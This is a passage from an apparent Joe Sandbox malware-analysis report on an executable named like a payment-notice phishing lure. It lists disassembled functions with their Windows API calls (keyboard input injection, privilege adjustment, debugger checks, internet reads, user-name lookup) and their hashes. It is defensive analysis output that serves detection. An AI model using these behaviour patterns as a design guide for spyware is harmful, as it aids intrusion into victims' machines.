Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
String ID:
API String ID: 1991900642-0
Opcode ID: 6766e0151d75e065f4cc14cbae666d00c0f54f86e1ebe610bd322365b84ba284
Instruction ID: 7562f496b1162d0873a415d915f774c36f8a2cfa4a8a05c91eb3de89ba27c70a
Opcode Fuzzy Hash: 6766e0151d75e065f4cc14cbae666d00c0f54f86e1ebe610bd322365b84ba284
Instruction Fuzzy Hash: 06514C715083409FD710EF29C886A6BBBE8FF89754F40492DF595D7262EB70E904CB92

Function 0094AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 0094AAAC
SetKeyboardState.USER32(00000080), ref: 0094AAC8
PostMessageW.USER32(?,00000102,00000001,00000001), ref: 0094AB36
SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 0094AB88

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: f405b3a8fc165d5fd51ca91f7d56d42b70546d4c44b7ef99cf1b400efec3ef1d
Instruction ID: 66d935ca39955cef175ce32ef6234f70da8a01855a0be217a1438870dafeb9cf
Opcode Fuzzy Hash: f405b3a8fc165d5fd51ca91f7d56d42b70546d4c44b7ef99cf1b400efec3ef1d
Instruction Fuzzy Hash: 0F312470AC0208AEFF35CB65CC05FFA7BAAEB94320F04421BF585961D0D3798981D7A2

Function 0091BB6F Relevance: 6.1, APIs: 4, Instructions: 90timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0091BB7F

Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0

GetTimeZoneInformation.KERNEL32 ref: 0091BB91
WideCharToMultiByte.KERNEL32(00000000,?,009B121C,000000FF,?,0000003F,?,?), ref: 0091BC09
WideCharToMultiByte.KERNEL32(00000000,?,009B1270,000000FF,?,0000003F,?,?,?,009B121C,000000FF,?,0000003F,?,?), ref: 0091BC36

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
String ID:
API String ID: 806657224-0
Opcode ID: 042cb60ee7de8d446ba4f0a3fed00a07f7e56b8ad23212796f44524f084214db
Instruction ID: 6008b0b5ae8d4cf44f98fa534432929cf273591406ee546fcc782106a8db76e2
Opcode Fuzzy Hash: 042cb60ee7de8d446ba4f0a3fed00a07f7e56b8ad23212796f44524f084214db
Instruction Fuzzy Hash: 96310471A08209DFCB15DF68CD909ADBBB9FF4532075442AEE060DB2B1C7309D81DB90

Function 0095CE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,?,00000400,?), ref: 0095CE89
GetLastError.KERNEL32(?,00000000), ref: 0095CEEA
SetEvent.KERNEL32(?,?,00000000), ref: 0095CEFE

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorEventFileInternetLastRead
String ID:
API String ID: 234945975-0
Opcode ID: a84ed2004e20a59941296ccf2b3c434f02edc70d46e23e55c6a2423b0566e86e
Instruction ID: c0c4754162854fc463e0b5bfa9fa1a6b6c5466caaf02e5ecc5f3420215e30570
Opcode Fuzzy Hash: a84ed2004e20a59941296ccf2b3c434f02edc70d46e23e55c6a2423b0566e86e
Instruction Fuzzy Hash: 6821BDB25043059FEB20CFA6C949BA677FCEB40319F10481EE946A2151E774EE489B90

Function 0094DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00925222), ref: 0094DBCE
GetFileAttributesW.KERNEL32(?), ref: 0094DBDD
FindFirstFileW.KERNEL32(?,?), ref: 0094DBEE
FindClose.KERNEL32(00000000), ref: 0094DBFA

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: d1996a6f6cd9909c90a15a28f04fb7335d7b259b423898e3be31ef7f940fefd9
Instruction ID: ea371f120befd5f862a0426e6c7c35ae878b0ae6b200ab34c321be242d06b6e7
Opcode Fuzzy Hash: d1996a6f6cd9909c90a15a28f04fb7335d7b259b423898e3be31ef7f940fefd9
Instruction Fuzzy Hash: BCF023714295105782216FBCDC4DC6A376C9F02339B504716F479C10F0EBB09DD4D6D5

Function 00948298 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 568stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,?,?,00000000), ref: 009482AA

Strings

|, xrefs: 009482DA
(, xrefs: 009482F0

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: lstrlen
String ID: ($|
API String ID: 1659193697-1631851259
Opcode ID: 32159dee1923542b5d520e02669b0de6ff657e97534708fe31348c625c4c561f
Instruction ID: a2e3816d629df1e6f842c6aad02c7b418559d503b2ea0eda23cff3e9fa64090d
Opcode Fuzzy Hash: 32159dee1923542b5d520e02669b0de6ff657e97534708fe31348c625c4c561f
Instruction Fuzzy Hash: 6E322575A006059FCB28CF69C481E6AB7F0FF48710B15C56EE59ADB3A1EB70E981CB40

Function 00955C97 Relevance: 4.6, APIs: 3, Instructions: 138fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00955CC1
FindNextFileW.KERNEL32(00000000,?), ref: 00955D17
FindClose.KERNEL32(?), ref: 00955D5F

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: b14190d7bad50afa07549af2ceb5ce492f269d0bfe9dff81e0e93712a8ab34c6
Instruction ID: 86bba7d07dcde8b8b90e7d7c232b3f298d4ea98b6305ca73fa47acac4df32052
Opcode Fuzzy Hash: b14190d7bad50afa07549af2ceb5ce492f269d0bfe9dff81e0e93712a8ab34c6
Instruction Fuzzy Hash: F9519B756046019FC714CF29C494A9AB7F8FF4A314F15855DE9AA8B3A2CB30ED44CF91

Function 00912622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0091271A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00912724
UnhandledExceptionFilter.KERNEL32(?), ref: 00912731

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: dd5c31487a5bfb75f4abbbdd3390c13b084206c2ce89b6c4916ad9dbf48cda69
Instruction ID: a7dc8760a7b091a609ae777034975cdf38bcbf189a3dca0958cc46c67074b407
Opcode Fuzzy Hash: dd5c31487a5bfb75f4abbbdd3390c13b084206c2ce89b6c4916ad9dbf48cda69
Instruction Fuzzy Hash: 9031D67591121C9BCB21DF68DD897DDB7B8AF48310F5041EAE41CA72A1E7309F818F45

Function 009551CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 009551DA
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00955238
SetErrorMode.KERNEL32(00000000), ref: 009552A1

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 7889572ceb5f94e0757af5aff91b024b327d6f6958d0ae135e4da532d9ec1c42
Instruction ID: aadfac842077c3ba5f9de72d81832b51ceeba0ce026606d65a5ef21f65e65096
Opcode Fuzzy Hash: 7889572ceb5f94e0757af5aff91b024b327d6f6958d0ae135e4da532d9ec1c42
Instruction Fuzzy Hash: E031BF75A00508DFDB00DF55D884EADBBB4FF09314F0580A9E809AB362DB31EC4ACB91

Function 009416C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON

Download Yara Rule

APIs

Part of subcall function 008FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00900668
Part of subcall function 008FFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00900685

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0094170D
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0094173A
GetLastError.KERNEL32 ref: 0094174A

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID:
API String ID: 577356006-0
Opcode ID: 20b1cbda3203933b8b46cd8978ad2b0c967c3b90138a158afd8ea85526c4b380
Instruction ID: 5c19acca6426fd6cf09292c5e5a6ff5af7636cda3ef0f72dbca69bbf2277a4d1
Opcode Fuzzy Hash: 20b1cbda3203933b8b46cd8978ad2b0c967c3b90138a158afd8ea85526c4b380
Instruction Fuzzy Hash: 4D11CEB2414309AFE718AF64DC86D6AB7BDFF04714B20852EE15693241EB70FC818B60

Function 0094D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0094D608
DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0094D645
CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0094D650

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: CloseControlCreateDeviceFileHandle
String ID:
API String ID: 33631002-0
Opcode ID: abd04d0c6bb03b80130b6e13ac1651b0a4cdfb2c0b8d7771b18cfb7db9e820e5
Instruction ID: 811e3f5748f1608a3eb34b712a33fcad2c2b6e6ae3286c3a9aedbbd160ceeb62
Opcode Fuzzy Hash: abd04d0c6bb03b80130b6e13ac1651b0a4cdfb2c0b8d7771b18cfb7db9e820e5
Instruction Fuzzy Hash: 7511A1B6E05228BFDB108F98DC44FAFBFBCEB45B50F108125F908E7290C2704A018BA1

Function 00941663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0094168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 009416A1
FreeSid.ADVAPI32(?), ref: 009416B1

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: cfa6a3491f0db0fe9bbd8c9e13e6fbcb95dcebd056c5d2fd0133f2a414777a1d
Instruction ID: a17d3918a147d0916cc6b343115465aafb2d79652d5411e0b771a9c2a6b53012
Opcode Fuzzy Hash: cfa6a3491f0db0fe9bbd8c9e13e6fbcb95dcebd056c5d2fd0133f2a414777a1d
Instruction Fuzzy Hash: B8F0F4B2950309FBDF00DFE49C89EAEBBBCFB08604F504565E501E2181E774AA849BA0

Function 00904CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(009128E9,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002,00000000,?,009128E9), ref: 00904D09
TerminateProcess.KERNEL32(00000000,?,00904CBE,009128E9,009A88B8,0000000C,00904E15,009128E9,00000002,00000000,?,009128E9), ref: 00904D10
ExitProcess.KERNEL32 ref: 00904D22

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 1e3a4b946854b8c4d32bdf3f1721564b4a9f6319003cf4110870d40b7ddc789c
Instruction ID: 0242f1fb78880037b9bf2c34a71b59d3646aa2489035ef3c32a521b98c184651
Opcode Fuzzy Hash: 1e3a4b946854b8c4d32bdf3f1721564b4a9f6319003cf4110870d40b7ddc789c
Instruction Fuzzy Hash: D3E0B6B2114248BFCF11AF54DD0AA583B6DEB81B85B108018FD099A1B2CB35ED82DB80

Function 0093D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 0093D28C

Strings

X64, xrefs: 0093D2A8

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: NameUser
String ID: X64
API String ID: 2645101109-893830106
Opcode ID: ebad1094f7d09e45d64c5ce57b65cd50feb97421859f648805ed7a383b3c6b48
Instruction ID: 79cc3311d5f3a09fac9056f64bb0d45baca58a8e577c2e027caabdae969518d9
Opcode Fuzzy Hash: ebad1094f7d09e45d64c5ce57b65cd50feb97421859f648805ed7a383b3c6b48
Instruction Fuzzy Hash: CFD0C9B581511DEADF90CBA0EC88DDAB37CBB04305F100555F606E2000DB3495489F10

Function 0090CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction ID: b29bbdd2880a89e796e68f97d0dea015bfe5a1e7f15416a296dd096aa3fcbf3f
Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
Instruction Fuzzy Hash: F5021DB1E001299FDF14CFA9C8806ADBBF5EF88314F25466AE919E7384D731AD418B94

Function 009568EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00956918
FindClose.KERNEL32(00000000), ref: 00956961

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: cb2029e588515ad76c9c304a2d4980f06d981b781f05fbb86c511bfb99120eee
Instruction ID: 658f2487575da50b5330faaba0e445999e7c20eb9550d4ad5e945a204c442296
Opcode Fuzzy Hash: cb2029e588515ad76c9c304a2d4980f06d981b781f05fbb86c511bfb99120eee
Instruction Fuzzy Hash: 0611D0716042009FC710CF2AD484A16BBE4FF85329F44C69DE8698F2A2CB30EC45CB91

Function 009537B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00964891,?,?,00000035,?), ref: 009537E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00964891,?,?,00000035,?), ref: 009537F4

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: e1271025082eb70e8e4b33b1d21495f07747dfbe545f1f3d28bef7b5675daa86
Instruction ID: a791772a4ead227f22f1b96c3f8e4bbc35dd422787047cbf4afe1126a925a0a9
Opcode Fuzzy Hash: e1271025082eb70e8e4b33b1d21495f07747dfbe545f1f3d28bef7b5675daa86
Instruction Fuzzy Hash: DBF0ECB16042252AE71057765C4DFDB379DEFC5761F000165F509D2281D9609944D7B0

Function 0094B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0094B25D
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 0094B270

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 5ec22f9b2d2942f1e14ccd81bd7e6a8b6b296165a35725d59bf6a0ba73809ff8
Instruction ID: 23ebc24e5e4ba15f68f65c15f944624fbec23e323beced1771bab034de0aaf9e
Opcode Fuzzy Hash: 5ec22f9b2d2942f1e14ccd81bd7e6a8b6b296165a35725d59bf6a0ba73809ff8
Instruction Fuzzy Hash: 56F01D7181424EABDB059FA0C805BAE7BB4FF14305F008409F965A5191D779D6519F94

Function 009410BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,009411FC), ref: 009410D4
CloseHandle.KERNEL32(?,?,009411FC), ref: 009410E9

Memory Dump Source

Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true

Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
